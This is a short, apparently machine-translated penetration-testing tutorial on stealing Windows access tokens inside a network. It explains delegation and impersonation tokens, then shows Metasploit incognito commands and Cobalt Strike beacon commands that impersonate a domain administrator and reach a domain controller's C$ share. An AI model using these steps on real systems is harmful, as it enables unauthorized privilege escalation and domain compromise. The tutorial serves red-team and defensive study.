Intranet penetration token stealing

token
A token is an object that describes a process or thread security context .
After different users log on to the computer , Will generate a Access Token, This Token It is used when the user creates a process or thread ,
Keep copying , That explains A The user creates a process that does not B User's rights . Generally, users double-click to run a process will copy explorer.exe Of Access Toke

Access tokens are divided into ：
authorization token （Delegation token）： Interactive session login （ example ： Local users log in 、 User desktop, etc ）
Impersonate token （Impersonation token）： Non interactive login （ example ：net use Access shared files ）
Two kinds of token It will be cleared only after the system is restarted ; Authorization token in ⽤ After account cancellation , The token becomes an analog token and is still valid .

Metasploit Token theft
This tool needs to be authorized as system Permission to view all token

# Load module 
use incognito

# List token
list_tokens -u

# steal token
impersonate_token 'AA\Administrator'

meterpreter > impersonate_token 'AA\Administrator'
[+] Delegation token available
[+] Successfully impersonated user AA\Administrator
meterpreter > getuid
Server username: AA\Administrator

 After executing the order , Return to the previous... With the following command token
rev2self 
## or 
drop_token

Cobalt strike Stealing domain administrator token in actual combat
The right is system after , Check the process , It is found that Firefox is running as a domain administrator , To steal .
beacon> steal_token 1260 Stealing tokens
beacon> rev2self Recovery token

After success , Access to domain control succeeded This is equivalent to raising the permission to the domain administrator
dir\172.16.2.2\c$